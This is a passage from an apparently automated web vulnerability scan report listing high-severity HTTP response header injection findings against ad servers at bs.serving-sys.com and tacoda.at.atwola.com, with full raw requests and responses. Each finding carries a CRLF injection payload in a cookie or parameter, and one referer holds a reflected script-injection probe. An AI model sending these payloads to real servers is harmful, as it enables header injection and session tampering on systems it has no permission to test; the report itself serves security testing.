Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 41419%0d%0ae7ec5e7748f was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204319&PluID=0&w=728&h=90&ord=143484280500666882&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=143484280500666882&mt_id=109450&mt_adid=100341&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?axEWAN5XFAA1TX4AAAAAAP9.HwAAAAAAAAAAAAYAAAAAAA8AAgAGDW98IAAAAAAA.K4ZAAAAAADDeikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW3AwAAAAAAAIAAwAAAAAA001iEFg5.D89CtejcD0KQKRwPQrXowFAZmZmZmZmEECkcD0K16MBQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMoVFbgWGeCRAbs.2Ej.WHJd9LdYf9A7DVvjx8AAAAAA==,,http%3A%2F%2Fhubpages.com%2Fhubs%2Fhot%2F,Z%3D728x90%26s%3D1333214%26_salt%3D2951543907%26B%3D10%26u%3Dhttp%253A%252F%252Fhubpages.com%252Fhubs%252Fhot%252F%26r%3D0,0e707dc2-360b-11e0-96c5-003048d44840
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=041419%0d%0ae7ec5e7748f; A3=gPVtafzY0bnA00001gSdsafy50aSU00003gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000Sf+JvabEk02WG00002fFb9afAF02WG00001gNfHaaiN0aVX00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeaf5V0c9M00001gy3.ach00c9M00001cRreabeg03Dk00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXhaf5V0c9M00003gK8raeXe0aA900001gSdmafy60aSU00002heXiafvG0c9M00003heXjafWs0c9M00001gSdnafwN0aSU00003gCTVa9bU0c9M00001hbwIaeVY09SF00002gSdpafvK0aSU00001heXaaf9P0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; B3=89PS000000000St87lgH0000000001sG8qiu0000000002t68bvZ0000000001t689PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav0000000007t98j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG8qaw0000000001t7852z0000000001sS8qay0000000001t7852A0000000001sS8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=041419
e7ec5e7748f
; expires=Thu, 12-May-2011 13: 16:39 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gSdsafy50aSU00003gPVtafzY0bnA00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gNfHaaiN0aVX00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001cRreabeg03Dk00001gK8raeXe0aA900001heXhagzY0c9M00004heXiafvG0c9M00003gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gCTVa9bU0c9M00001gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; expires=Thu, 12-May-2011 13:16:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8bvZ0000000001t68qiu0000000002t67lgH0000000001sG89PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000001t77gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t78n7e0000000002tb; expires=Thu, 12-May-2011 13:16:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 12-May-2011 13:16:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 11 Feb 2011 18:16:39 GMT
Connection: close
Content-Length: 2219

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload cbbd7%0d%0af938777aeaa was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=cbbd7%0d%0af938777aeaa&wmpv=0&res=128&bwVal=1948&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.404919&debuglevel=&FLV=cbbd7
f938777aeaa
&RES=128&WMPV=0; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload f5af6%0d%0aac97bd0a503 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=10.2154&wmpv=0&res=f5af6%0d%0aac97bd0a503&bwVal=1948&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.404919&debuglevel=&FLV=10.2154&RES=f5af6
ac97bd0a503
&WMPV=0; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload fbc21%0d%0a0ecd66392fc was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4357411~~0~~~^ebAboveTheFold~0~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.2911431968677789&flv=10.2154&wmpv=fbc21%0d%0a0ecd66392fc&res=128&bwVal=1948&bwTime=1297607871095 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 09:43:05 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.404919&debuglevel=&FLV=10.2154&RES=128&WMPV=fbc21
0ecd66392fc
; expires=Sat, 14-May-2011 09: 43:05 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 13 Feb 2011 14:43:05 GMT
Connection: close
Content-Length: 0


1.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload d0d61%0d%0a2c97e4afc64 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=APE&si=18199&pi=M&xs=3&pu=http%253A//tags.bluekai.com/site/50%253Fret%253Dhtml%2526limit%253D4%2526btp%253D1%2526phint%253Dkw%25253D%2526phint%253Deid%25253D283%2526phint%253Da%25253D-1%2526phint%253Dg%25253D0%2526uhint%253Dzip%25253D0%2526phint%253Dtcat%25253D152869%2526phint%253Dkh%25253DDBDCB53F2576976D806D6498794024FC353f6%25252527%2525253balert%252525281%25252529%2525252f%2525252fc16c49bef95%2526phint%253Dbread%25253D%255BJewelry%252520%2526%252520Watches%252C%252520Engagement%252520%2526%252520Wedding%252C%252520Engagement%252520Rings%252C%252520Diamond%252C%252520Diamond%252520Solitaire%252520with%252520Accents%255D%2526phint%253Dbin%25253D1499.99%2526phint%253Dasp%25253DMain%252520Stone%252520Shape%252CHeart%252CMain%252520Stone%252520Treatment%252CNot%252520Enhanced%252CCarat%252520Total%252520Weight%252C0.90%252520-%2525201.39%252CExact%252520Carat%252520Total%252520Weight%252C.90%252CMain%252520Stone%252520Certification/Grading%252CEGL%252520USA%252CMetal%252C14k%252520White%252520Gold%252CMetal%252520Purity%252C14k%252CRing%252520Size%252C6%252CMain%252520Stone%252CDiamond%252CStyle%252CEngagement%252CJewelry%252520Type%252CRing%252CSize%252C6%252CGender%252CWomen%2527s%2526ifu%253Dhttp%25253A//burp/show/16%2526cmmiss%253D-1%2526cmkw%253D&r=tags.bluekai.com&v=5.5&cb=25243 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; Anxd=x; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5d0d61%0d%0a2c97e4afc64; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 14:22:42 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 13 Feb 2011 14:37:42 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298211762; path=/; expires=Sun, 20-Feb-11 14:22:42 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297606962^1297608762|18199^1297606962^1297608762; path=/; expires=Sun, 13-Feb-11 14:52:42 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; expires=Wed, 08-Feb-12 14:22:42 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 13-Feb-11 20:22:42 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5d0d61
2c97e4afc64
,3e9134c20f00f3af730f8d42d1020fd5; expires=Wed, 08-Feb-12 14:22:42 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=; expires=Wed, 08-Feb-12 14:22:42 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 84bf8%0d%0a588720eedd1 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=APE&si=84bf8%0d%0a588720eedd1&pi=M&xs=3&pu=http%253A//tags.bluekai.com/site/50%253Fret%253Dhtml%2526limit%253D4%2526btp%253D1%2526phint%253Dkw%25253D%2526phint%253Deid%25253D283%2526phint%253Da%25253D-1%2526phint%253Dg%25253D0%2526uhint%253Dzip%25253D0%2526phint%253Dtcat%25253D152869%2526phint%253Dkh%25253DDBDCB53F2576976D806D6498794024FC353f6%25252527%2525253balert%252525281%25252529%2525252f%2525252fc16c49bef95%2526phint%253Dbread%25253D%255BJewelry%252520%2526%252520Watches%252C%252520Engagement%252520%2526%252520Wedding%252C%252520Engagement%252520Rings%252C%252520Diamond%252C%252520Diamond%252520Solitaire%252520with%252520Accents%255D%2526phint%253Dbin%25253D1499.99%2526phint%253Dasp%25253DMain%252520Stone%252520Shape%252CHeart%252CMain%252520Stone%252520Treatment%252CNot%252520Enhanced%252CCarat%252520Total%252520Weight%252C0.90%252520-%2525201.39%252CExact%252520Carat%252520Total%252520Weight%252C.90%252CMain%252520Stone%252520Certification/Grading%252CEGL%252520USA%252CMetal%252C14k%252520White%252520Gold%252CMetal%252520Purity%252C14k%252CRing%252520Size%252C6%252CMain%252520Stone%252CDiamond%252CStyle%252CEngagement%252CJewelry%252520Type%252CRing%252CSize%252C6%252CGender%252CWomen%2527s%2526ifu%253Dhttp%25253A//burp/show/16%2526cmmiss%253D-1%2526cmkw%253D&r=tags.bluekai.com&v=5.5&cb=25243 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; Anxd=x; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; 